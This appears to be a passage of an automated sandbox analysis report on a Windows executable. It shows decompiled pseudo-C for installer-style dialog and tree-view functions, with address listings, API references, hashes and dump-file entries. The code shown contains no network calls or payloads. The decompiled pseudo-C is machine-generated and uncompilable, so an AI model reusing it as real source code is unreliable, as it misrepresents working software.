								if(_a16 == 0) {
									L75:
									E004011EF(_t298, 0, 0);
									_v36 =  *0x420d48;
									_t206 =  *0x424788;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x42478c <= 0) {
										L86:
										if( *0x42474c == 4) {
											InvalidateRect(_v8, 0, 1);
										}
										_t207 =  *0x423f1c; // 0x5bb880
										if( *((intOrPtr*)(_t207 + 0x10)) != 0) {
											E00404BBA(0x3ff, 0xfffffffb, E00404BD2(5));
										}
										goto L90;
									}
									_t322 = _t206 + 8;
									do {
										_t212 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t212 != 0) {
											_t300 =  *_t322;
											_v72 = _t212;
											_v76 = 8;
											if((_t300 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t322[4]);
												_t322[0] = _t322[0] & 0x000000fe;
											}
											if((_t300 & 0x00000040) == 0) {
												_t216 = (_t300 & 0x00000001) + 1;
												if((_t300 & 0x00000010) != 0) {
													_t216 = _t216 + 3;
												}
											} else {
												_t216 = 3;
											}
											_v68 = (_t216 << 0x0000000b | _t300 & 0x00000008) + (_t216 << 0x0000000b | _t300 & 0x00000008) | _t300 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t300 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageA(_v8, 0x110d, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t322 =  &(_t322[0x106]);
									} while (_v24 <  *0x42478c);
									goto L86;
								} else {
									_t323 = E004012E2( *0x420d48);
									E00401299(_t323);
									_t227 = 0;
									_t298 = 0;
									if(_t323 <= 0) {
										L74:
										SendMessageA(_v12, 0x14e, _t298, 0);
										_a16 = _t323;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t227 * 4)) != 0) {
											_t298 = _t298 + 1;
										}
										_t227 = _t227 + 1;
									} while (_t227 < _t323);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t237 = SendMessageA(_v12, 0x147, 0, 0);
							if(_t237 == 0xffffffff) {
								goto L93;
							}
							_t324 = SendMessageA(_v12, 0x150, _t237, 0);
							if(_t324 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t324 * 4)) == 0) {
								_t324 = 0x20;
							}
							E00401299(_t324);
							SendMessageA(_a4, 0x420, 0, _t324);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					 *0x4247c0 = _a4;
					_v20 = 2;
					 *0x420d48 = GlobalAlloc(0x40,  *0x42478c << 2);
					_t264 = LoadImageA( *0x424740, 0x6e, 0, 0, 0, 0);
					 *0x420d3c =  *0x420d3c | 0xffffffff;
					_v16 = _t264;
					 *0x420d44 = SetWindowLongA(_v8, 0xfffffffc, E004052C3);
					_t266 = ImageList_Create(_t320, _t320, 0x21, 6, 0);
					 *0x420d34 = _t266;
					ImageList_AddMasked(_t266, _v16, 0xff00ff);
					SendMessageA(_v8, 0x1109, 2,  *0x420d34);
					if(SendMessageA(_v8, 0x111c, 0, 0) < _t320) {
						SendMessageA(_v8, 0x111b, _t320, 0);
					}
					DeleteObject(_v16);
					_t327 = 0;
					do {
						_t272 =  *((intOrPtr*)(_v28 + _t327 * 4));
						if( *((intOrPtr*)(_v28 + _t327 * 4)) != 0) {
							if(_t327 != 0x20) {
								_v20 = 0;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, 0, E004062BB(0, _t327, _t331, 0, _t272)), _t327);
						}
						_t327 = _t327 + 1;
					} while (_t327 < 0x21);
					_t328 = _a16;
					_push( *((intOrPtr*)(_t328 + 0x30 + _v20 * 4)));
					_push(0x15);
					E004042AC(_a4);
					_push( *((intOrPtr*)(_t328 + 0x34 + _v20 * 4)));
					_push(0x16);
					E004042AC(_a4);
					_t329 = 0;
					_v16 = 0;
					if( *0x42478c <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t316 = _v24 + 8;
						_v32 = _t316;
						do {
							_t284 =  &(_t316[0x10]);
							if( *_t284 != 0) {
								_v64 = _t284;
								_t285 =  *_t316;
								_v88 = _v16;
								_t308 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t308;
								_v44 = _t329;
								_v72 = _t285 & _t308;
								if((_t285 & 0x00000002) == 0) {
									if((_t285 & 0x00000004) == 0) {
										 *( *0x420d48 + _t329 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v88);
									} else {
										_v16 = SendMessageA(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t290 = SendMessageA(_v8, 0x1100, 0,  &_v88);
									_v36 = 1;
									 *( *0x420d48 + _t329 * 4) = _t290;
									_v16 =  *( *0x420d48 + _t329 * 4);
								}
							}
							_t329 = _t329 + 1;
							_t316 =  &(_v32[0x418]);
							_v32 = _t316;
						} while (_t329 <  *0x42478c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E004042E1(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E004042E1(_v12);
								L93:
								return E00404313(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}


























































                                          0x00404ccf
                                          0x00404cd7
                                          0x00404cdf
                                          0x00404ce5
                                          0x00404cfd
                                          0x00404d00
                                          0x00404d01
                                          0x00404f2e
                                          0x00404f35
                                          0x00404f49
                                          0x00404f37
                                          0x00404f39
                                          0x00404f3c
                                          0x00404f3d
                                          0x00404f44
                                          0x00404f44
                                          0x00404f55
                                          0x00404f63
                                          0x00404f66
                                          0x00404f7c
                                          0x00404ff1
                                          0x00404ff4
                                          0x00404ff6
                                          0x00405000
                                          0x0040500e
                                          0x0040500e
                                          0x00405010
                                          0x0040501a
                                          0x00405020
                                          0x00405023
                                          0x00405026
                                          0x00405041
                                          0x00405028
                                          0x00405032
                                          0x00405032
                                          0x00405026
                                          0x0040501a
                                          0x00000000
                                          0x00404ff4
                                          0x00404f81
                                          0x00404f8c
                                          0x00404f91
                                          0x00404f98
                                          0x00404f9d
                                          0x00404fa1
                                          0x00404fac
                                          0x00404fac
                                          0x00404fb0
                                          0x00404fb4
                                          0x00404fb8
                                          0x00404fcb
                                          0x00404fba
                                          0x00404fba
                                          0x00404fc1
                                          0x00404fc7
                                          0x00404fc3
                                          0x00404fc3
                                          0x00404fc3
                                          0x00404fc1
                                          0x00404fcf
                                          0x00404fd1
                                          0x00404fe4
                                          0x00404fe7
                                          0x00404fea
                                          0x00404fea
                                          0x00404fb4
                                          0x00000000
                                          0x00404fa1
                                          0x00404f83
                                          0x00404f8a
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00405044
                                          0x00405044
                                          0x0040504b
                                          0x004050bc
                                          0x004050c4
                                          0x004050cc
                                          0x004050cc
                                          0x004050d5
                                          0x004050d7
                                          0x004050de
                                          0x004050e1
                                          0x004050e1
                                          0x004050e7
                                          0x004050ee
                                          0x004050f1
                                          0x004050f1
                                          0x004050f7
                                          0x004050fd
                                          0x00405103
                                          0x00405103
                                          0x00405110
                                          0x00405270
                                          0x00405277
                                          0x00405294
                                          0x0040529a
                                          0x004052ac
                                          0x004052ac
                                          0x00000000
                                          0x00405116
                                          0x00405118
                                          0x0040511d
                                          0x00405122
                                          0x00405127
                                          0x00405129
                                          0x00405129
                                          0x0040512a
                                          0x0040512b
                                          0x0040512d
                                          0x0040512d
                                          0x00405135
                                          0x00405176
                                          0x00405178
                                          0x00405188
                                          0x0040518b
                                          0x00405190
                                          0x00405197
                                          0x0040519a
                                          0x0040523c
                                          0x00405244
                                          0x0040524c
                                          0x0040524c
                                          0x00405252
                                          0x0040525a
                                          0x0040526b
                                          0x0040526b
                                          0x00000000
                                          0x0040525a
                                          0x004051a0
                                          0x004051a3
                                          0x004051a9
                                          0x004051ae
                                          0x004051b0
                                          0x004051b2
                                          0x004051b8
                                          0x004051bf
                                          0x004051c4
                                          0x004051cb
                                          0x004051ce
                                          0x004051ce
                                          0x004051d5
                                          0x004051e1
                                          0x004051e5
                                          0x004051e7
                                          0x004051e7
                                          0x004051d7
                                          0x004051d9
                                          0x004051d9
                                          0x00405207
                                          0x00405213
                                          0x00405222
                                          0x00405222
                                          0x00405224
                                          0x00405227
                                          0x00405230
                                          0x00000000
                                          0x00405137
                                          0x00405142
                                          0x00405145
                                          0x0040514a
                                          0x0040514c
                                          0x00405150
                                          0x00405160
                                          0x0040516a
                                          0x0040516c
                                          0x0040516f
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00405152
                                          0x00405152
                                          0x00405158
                                          0x0040515a
                                          0x0040515a
                                          0x0040515b
                                          0x0040515c
                                          0x00000000
                                          0x00405152
                                          0x00405135
                                          0x00405110
                                          0x00405053
                                          0x00000000
                                          0x00405069
                                          0x00405073
                                          0x00405078
                                          0x00000000
                                          0x00000000
                                          0x0040508a
                                          0x0040508f
                                          0x0040509b
                                          0x0040509b
                                          0x0040509d
                                          0x004050ac
                                          0x004050ae
                                          0x004050b2
                                          0x004050b5
                                          0x00000000
                                          0x004050b5
                                          0x00405053
                                          0x00404d07
                                          0x00404d0a
                                          0x00404d0d
                                          0x00404d1d
                                          0x00404d30
                                          0x00404d3b
                                          0x00404d41
                                          0x00404d4f
                                          0x00404d62
                                          0x00404d67
                                          0x00404d72
                                          0x00404d7b
                                          0x00404d91
                                          0x00404da1
                                          0x00404dad
                                          0x00404dad
                                          0x00404db2
                                          0x00404db8
                                          0x00404dba
                                          0x00404dbd
                                          0x00404dc2
                                          0x00404dc7
                                          0x00404dc9
                                          0x00404dc9
                                          0x00404de9
                                          0x00404de9
                                          0x00404deb
                                          0x00404dec
                                          0x00404df1
                                          0x00404df7
                                          0x00404dfb
                                          0x00404e00
                                          0x00404e08
                                          0x00404e0c
                                          0x00404e11
                                          0x00404e16
                                          0x00404e1e
                                          0x00404e21
                                          0x00404ef0
                                          0x00404f03
                                          0x00000000
                                          0x00404e27
                                          0x00404e2a
                                          0x00404e2d
                                          0x00404e30
                                          0x00404e30
                                          0x00404e35
                                          0x00404e3e
                                          0x00404e41
                                          0x00404e45
                                          0x00404e48
                                          0x00404e4b
                                          0x00404e54
                                          0x00404e5d
                                          0x00404e60
                                          0x00404e63
                                          0x00404e66
                                          0x00404ea4
                                          0x00404ecf
                                          0x00404ea6
                                          0x00404eb5
                                          0x00404eb5
                                          0x00404e68
                                          0x00404e6b
                                          0x00404e79
                                          0x00404e83
                                          0x00404e8b
                                          0x00404e92
                                          0x00404e9d
                                          0x00404e9d
                                          0x00404e66
                                          0x00404ed5
                                          0x00404ed6
                                          0x00404ee2
                                          0x00404ee2
                                          0x00404eee
                                          0x00404f09
                                          0x00404f0c
                                          0x00404f29
                                          0x00000000
                                          0x00404f0e
                                          0x00404f13
                                          0x00404f1c
                                          0x004052ae
                                          0x004052c0
                                          0x004052c0
                                          0x00404f0c
                                          0x00000000
                                          0x00404eee
                                          0x00404e21

                                          APIs
                                          • GetDlgItem.USER32 ref: 00404CC8
                                          • GetDlgItem.USER32 ref: 00404CD5
                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404D24
                                          • LoadImageA.USER32 ref: 00404D3B
                                          • SetWindowLongA.USER32 ref: 00404D55
                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D67
                                          • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404D7B
                                          • SendMessageA.USER32(?,00001109,00000002), ref: 00404D91
                                          • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404D9D
                                          • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404DAD
                                          • DeleteObject.GDI32(00000110), ref: 00404DB2
                                          • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404DDD
                                          • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404DE9
                                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404E83
                                          • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404EB3
                                            • Part of subcall function 004042E1: SendMessageA.USER32(00000028,?,00000001,00404111), ref: 004042EF
                                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404EC7
                                          • GetWindowLongA.USER32 ref: 00404EF5
                                          • SetWindowLongA.USER32 ref: 00404F03
                                          • ShowWindow.USER32(?,00000005), ref: 00404F13
                                          • SendMessageA.USER32(?,00000419,00000000,?), ref: 0040500E
                                          • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00405073
                                          • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00405088
                                          • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 004050AC
                                          • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 004050CC
                                          • ImageList_Destroy.COMCTL32(?), ref: 004050E1
                                          • GlobalFree.KERNEL32 ref: 004050F1
                                          • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 0040516A
                                          • SendMessageA.USER32(?,00001102,?,?), ref: 00405213
                                          • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00405222
                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0040524C
                                          • ShowWindow.USER32(?,00000000), ref: 0040529A
                                          • GetDlgItem.USER32 ref: 004052A5
                                          • ShowWindow.USER32(00000000), ref: 004052AC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.656113568.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.656098530.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656133616.0000000000408000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656142531.000000000040A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656152726.0000000000413000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656167614.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656175020.000000000042A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656182728.000000000042D000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                          • String ID: $M$N
                                          • API String ID: 2564846305-813528018
                                          • Opcode ID: 2a089ffaa6d080d8f9741abd0f9240871e5015f633a6bdd7d3a40dad24a0061c
                                          • Instruction ID: 1f2220219548b190c7fc9fe52a988bdfc75827026f4451c66edb8ee187498390
                                          • Opcode Fuzzy Hash: 2a089ffaa6d080d8f9741abd0f9240871e5015f633a6bdd7d3a40dad24a0061c
                                          • Instruction Fuzzy Hash: 33025DB0A00209AFDB20DF94DD45AAE7BB5FB84354F10817AF610BA2E1C7789D52DF58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00403DD8, Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346windowstringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 85%
                                          			E00403DD8(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				struct HWND__* _t49;
				signed int _t68;
				struct HWND__* _t74;
				signed int _t87;
				struct HWND__* _t92;
				signed int _t100;
				int _t104;
				signed int _t116;
				signed int _t117;
				int _t118;
				signed int _t123;
				struct HWND__* _t126;
				struct HWND__* _t127;
				int _t128;
				long _t131;
				int _t133;
				int _t134;
				void* _t135;
				void* _t143;

				_t116 = _a8;
				if(_t116 == 0x110 || _t116 == 0x408) {
					_t35 = _a12;
					_t126 = _a4;
					__eflags = _t116 - 0x110;
					 *0x420d38 = _t35;
					if(_t116 == 0x110) {
						 *0x424748 = _t126;
						 *0x420d4c = GetDlgItem(_t126, 1);
						_t92 = GetDlgItem(_t126, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x41fd18 = _t92;
						E004042AC(_t126);
						SetClassLongA(_t126, 0xfffffff2,  *0x423f28);
						 *0x423f0c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x420d38 = 1;
					}
					_t123 =  *0x40a1f8; // 0xffffffff
					_t134 = 0;
					_t131 = (_t123 << 6) +  *0x424780;
					__eflags = _t123;
					if(_t123 < 0) {
						L34:
						E004042F8(0x40b);
						while(1) {
							_t37 =  *0x420d38;
							 *0x40a1f8 =  *0x40a1f8 + _t37;
							_t131 = _t131 + (_t37 << 6);
							_t39 =  *0x40a1f8; // 0xffffffff
							__eflags = _t39 -  *0x424784;
							if(_t39 ==  *0x424784) {
								E0040140B(1);
							}
							__eflags =  *0x423f0c - _t134; // 0x0
							if(__eflags != 0) {
								break;
							}
							__eflags =  *0x40a1f8 -  *0x424784; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t131 + 0x14);
							E004062BB(_t117, _t126, _t131, 0x42c800,  *((intOrPtr*)(_t131 + 0x24)));
							_push( *((intOrPtr*)(_t131 + 0x20)));
							_push(0xfffffc19);
							E004042AC(_t126);
							_push( *((intOrPtr*)(_t131 + 0x1c)));
							_push(0xfffffc1b);
							E004042AC(_t126);
							_push( *((intOrPtr*)(_t131 + 0x28)));
							_push(0xfffffc1a);
							E004042AC(_t126);
							_t49 = GetDlgItem(_t126, 3);
							__eflags =  *0x4247ec - _t134;
							_v32 = _t49;
							if( *0x4247ec != _t134) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t49, _t117 & 0x00000008);
							EnableWindow( *(_t135 + 0x30), _t117 & 0x00000100);
							E004042CE(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x41fd18, _t118);
							__eflags = _t118 - _t134;
							if(_t118 == _t134) {
								_push(1);
							} else {
								_push(_t134);
							}
							EnableMenuItem(GetSystemMenu(_t126, _t134), 0xf060, ??);
							SendMessageA( *(_t135 + 0x38), 0xf4, _t134, 1);
							__eflags =  *0x4247ec - _t134;
							if( *0x4247ec == _t134) {
								_push( *0x420d4c);
							} else {
								SendMessageA(_t126, 0x401, 2, _t134);
								_push( *0x41fd18);
							}
							E004042E1();
							E00406228(0x420d50, E00403DB9());
							E004062BB(0x420d50, _t126, _t131,  &(0x420d50[lstrlenA(0x420d50)]),  *((intOrPtr*)(_t131 + 0x18)));
							SetWindowTextA(_t126, 0x420d50);
							_t68 = E00401389( *((intOrPtr*)(_t131 + 8)), _t134);
							__eflags = _t68;
							if(_t68 != 0) {
								continue;
							} else {
								__eflags =  *_t131 - _t134;
								if( *_t131 == _t134) {
									continue;
								}
								__eflags =  *(_t131 + 4) - 5;
								if( *(_t131 + 4) != 5) {
									DestroyWindow( *0x423f18);
									 *0x420528 = _t131;
									__eflags =  *_t131 - _t134;
									if( *_t131 <= _t134) {
										goto L58;
									}
									_t74 = CreateDialogParamA( *0x424740,  *_t131 +  *0x423f20 & 0x0000ffff, _t126,  *(0x40a1fc +  *(_t131 + 4) * 4), _t131);
									__eflags = _t74 - _t134;
									 *0x423f18 = _t74;
									if(_t74 == _t134) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t131 + 0x2c)));
									_push(6);
									E004042AC(_t74);
									GetWindowRect(GetDlgItem(_t126, 0x3fa), _t135 + 0x10);
									ScreenToClient(_t126, _t135 + 0x10);
									SetWindowPos( *0x423f18, _t134,  *(_t135 + 0x20),  *(_t135 + 0x20), _t134, _t134, 0x15);
									E00401389( *((intOrPtr*)(_t131 + 0xc)), _t134);
									__eflags =  *0x423f0c - _t134; // 0x0
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x423f18, 8);
									E004042F8(0x405);
									goto L58;
								}
								__eflags =  *0x4247ec - _t134;
								if( *0x4247ec != _t134) {
									goto L61;
								}
								__eflags =  *0x4247e0 - _t134;
								if( *0x4247e0 != _t134) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x423f18);
						 *0x424748 = _t134;
						EndDialog(_t126,  *0x420120);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t131 - _t134;
							if( *_t131 == _t134) {
								goto L61;
							}
							goto L34;
						}
						_t87 = E00401389( *((intOrPtr*)(_t131 + 0x10)), 0);
						__eflags = _t87;
						if(_t87 == 0) {
							goto L33;
						}
						SendMessageA( *0x423f18, 0x40f, 0, 1);
						__eflags =  *0x423f0c - _t134; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t126 = _a4;
					_t134 = 0;
					if(_t116 == 0x47) {
						SetWindowPos( *0x420d30, _t126, 0, 0, 0, 0, 0x13);
					}
					if(_t116 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x420d30,  ~(_a12 - 1) & _t116);
					}
					if(_t116 != 0x40d) {
						__eflags = _t116 - 0x11;
						if(_t116 != 0x11) {
							__eflags = _t116 - 0x111;
							if(_t116 != 0x111) {
								L26:
								return E00404313(_t116, _a12, _a16);
							}
							_t133 = _a12 & 0x0000ffff;
							_t127 = GetDlgItem(_t126, _t133);
							__eflags = _t127 - _t134;
							if(_t127 == _t134) {
								L13:
								__eflags = _t133 - 1;
								if(_t133 != 1) {
									__eflags = _t133 - 3;
									if(_t133 != 3) {
										_t128 = 2;
										__eflags = _t133 - _t128;
										if(_t133 != _t128) {
											L25:
											SendMessageA( *0x423f18, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x4247ec - _t134;
										if( *0x4247ec == _t134) {
											_t100 = E0040140B(3);
											__eflags = _t100;
											if(_t100 != 0) {
												goto L26;
											}
											 *0x420120 = 1;
											L21:
											_push(0x78);
											L22:
											E00404285();
											goto L26;
										}
										E0040140B(_t128);
										 *0x420120 = _t128;
										goto L21;
									}
									__eflags =  *0x40a1f8 - _t134; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t133);
								goto L22;
							}
							SendMessageA(_t127, 0xf3, _t134, _t134);
							_t104 = IsWindowEnabled(_t127);
							__eflags = _t104;
							if(_t104 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t126, _t134, _t134);
						return 1;
					} else {
						DestroyWindow( *0x423f18);
						 *0x423f18 = _a12;
						L58:
						if( *0x421d50 == _t134) {
							_t143 =  *0x423f18 - _t134; // 0x0
							if(_t143 != 0) {
								ShowWindow(_t126, 0xa);
								 *0x421d50 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}































                                          0x00403de1
                                          0x00403dea
                                          0x00403f2b
                                          0x00403f2f
                                          0x00403f33
                                          0x00403f35
                                          0x00403f3a
                                          0x00403f45
                                          0x00403f50
                                          0x00403f55
                                          0x00403f57
                                          0x00403f59
                                          0x00403f5c
                                          0x00403f61
                                          0x00403f6f
                                          0x00403f7c
                                          0x00403f83
                                          0x00403f83
                                          0x00403f84
                                          0x00403f84
                                          0x00403f89
                                          0x00403f8f
                                          0x00403f96
                                          0x00403f9c
                                          0x00403f9e
                                          0x00403fde
                                          0x00403fe3
                                          0x00403fe8
                                          0x00403fe8
                                          0x00403fed
                                          0x00403ff6
                                          0x00403ff8
                                          0x00403ffd
                                          0x00404003
                                          0x00404007
                                          0x00404007
                                          0x0040400c
                                          0x00404012
                                          0x00000000
                                          0x00000000
                                          0x0040401d
                                          0x00404023
                                          0x00000000
                                          0x00000000
                                          0x0040402c
                                          0x00404034
                                          0x00404039
                                          0x0040403c
                                          0x00404042
                                          0x00404047
                                          0x0040404a
                                          0x00404050
                                          0x00404055
                                          0x00404058
                                          0x0040405e
                                          0x00404066
                                          0x0040406c
                                          0x00404072
                                          0x00404076
                                          0x0040407d
                                          0x0040407d
                                          0x0040407d
                                          0x00404087
                                          0x00404099
                                          0x004040a5
                                          0x004040aa
                                          0x004040b4
                                          0x004040ba
                                          0x004040bc
                                          0x004040c1
                                          0x004040be
                                          0x004040be
                                          0x004040be
                                          0x004040d1
                                          0x004040e9
                                          0x004040eb
                                          0x004040f1
                                          0x00404106
                                          0x004040f3
                                          0x004040fc
                                          0x004040fe
                                          0x004040fe
                                          0x0040410c
                                          0x0040411d
                                          0x0040412e
                                          0x00404135
                                          0x0040413f
                                          0x00404144
                                          0x00404146
                                          0x00000000
                                          0x0040414c
                                          0x0040414c
                                          0x0040414e
                                          0x00000000
                                          0x00000000
                                          0x00404154
                                          0x00404158
                                          0x0040417d
                                          0x00404183
                                          0x00404189
                                          0x0040418b
                                          0x00000000
                                          0x00000000
                                          0x004041b1
                                          0x004041b7
                                          0x004041b9
                                          0x004041be
                                          0x00000000
                                          0x00000000
                                          0x004041c4
                                          0x004041c7
                                          0x004041ca
                                          0x004041e1
                                          0x004041ed
                                          0x00404206
                                          0x00404210
                                          0x00404215
                                          0x0040421b
                                          0x00000000
                                          0x00000000
                                          0x00404225
                                          0x00404230
                                          0x00000000
                                          0x00404230
                                          0x0040415a
                                          0x00404160
                                          0x00000000
                                          0x00000000
                                          0x00404166
                                          0x0040416c
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00404172
                                          0x00404146
                                          0x0040423d
                                          0x00404249
                                          0x00404250
                                          0x00000000
                                          0x00403fa0
                                          0x00403fa0
                                          0x00403fa3
                                          0x00403fd6
                                          0x00403fd6
                                          0x00403fd8
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00403fd8
                                          0x00403fa9
                                          0x00403fae
                                          0x00403fb0
                                          0x00000000
                                          0x00000000
                                          0x00403fc0
                                          0x00403fc8
                                          0x00000000
                                          0x00403fce
                                          0x00403dfc
                                          0x00403dfc
                                          0x00403e00
                                          0x00403e05
                                          0x00403e14
                                          0x00403e14
                                          0x00403e1d
                                          0x00403e26
                                          0x00403e31
                                          0x00403e31
                                          0x00403e3d
                                          0x00403e59
                                          0x00403e5c
                                          0x00403e6f
                                          0x00403e75
                                          0x00403f18
                                          0x00000000
                                          0x00403f21
                                          0x00403e7b
                                          0x00403e88
                                          0x00403e8a
                                          0x00403e8c
                                          0x00403eab
                                          0x00403eab
                                          0x00403eae
                                          0x00403eb3
                                          0x00403eb6
                                          0x00403ec6
                                          0x00403ec7
                                          0x00403ec9
                                          0x00403eff
                                          0x00403f12
                                          0x00000000
                                          0x00403f12
                                          0x00403ecb
                                          0x00403ed1
                                          0x00403eea
                                          0x00403eef
                                          0x00403ef1
                                          0x00000000
                                          0x00000000
                                          0x00403ef3
                                          0x00403edf
                                          0x00403edf
                                          0x00403ee1
                                          0x00403ee1
                                          0x00000000
                                          0x00403ee1
                                          0x00403ed4
                                          0x00403ed9
                                          0x00000000
                                          0x00403ed9
                                          0x00403eb8
                                          0x00403ebe
                                          0x00000000
                                          0x00000000
                                          0x00403ec0
                                          0x00000000
                                          0x00403ec0
                                          0x00403eb0
                                          0x00000000
                                          0x00403eb0
                                          0x00403e96
                                          0x00403e9d
                                          0x00403ea3
                                          0x00403ea5
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00403ea5
                                          0x00403e61
                                          0x00000000
                                          0x00403e3f
                                          0x00403e45
                                          0x00403e4f
                                          0x00404256
                                          0x0040425c
                                          0x0040425e
                                          0x00404264
                                          0x00404269
                                          0x0040426f
                                          0x0040426f
                                          0x00404264
                                          0x00404279
                                          0x00000000
                                          0x00404279
                                          0x00403e3d

                                          APIs
                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403E14
                                          • ShowWindow.USER32(?), ref: 00403E31
                                          • DestroyWindow.USER32 ref: 00403E45
                                          • SetWindowLongA.USER32 ref: 00403E61
                                          • GetDlgItem.USER32 ref: 00403E82
                                          • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403E96
                                          • IsWindowEnabled.USER32(00000000), ref: 00403E9D
                                          • GetDlgItem.USER32 ref: 00403F4B
                                          • GetDlgItem.USER32 ref: 00403F55
                                          • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403F6F
                                          • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403FC0
                                          • GetDlgItem.USER32 ref: 00404066
                                          • ShowWindow.USER32(00000000,?), ref: 00404087
                                          • EnableWindow.USER32(?,?), ref: 00404099
                                          • EnableWindow.USER32(?,?), ref: 004040B4
                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004040CA
                                          • EnableMenuItem.USER32 ref: 004040D1
                                          • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 004040E9
                                          • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 004040FC
                                          • lstrlenA.KERNEL32(00420D50,?,00420D50,00000000), ref: 00404126
                                          • SetWindowTextA.USER32(?,00420D50), ref: 00404135
                                          • ShowWindow.USER32(?,0000000A), ref: 00404269
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.656113568.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.656098530.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656133616.0000000000408000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656142531.000000000040A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656152726.0000000000413000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656167614.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656175020.000000000042A000.00000004.00020000.sdmp Download File
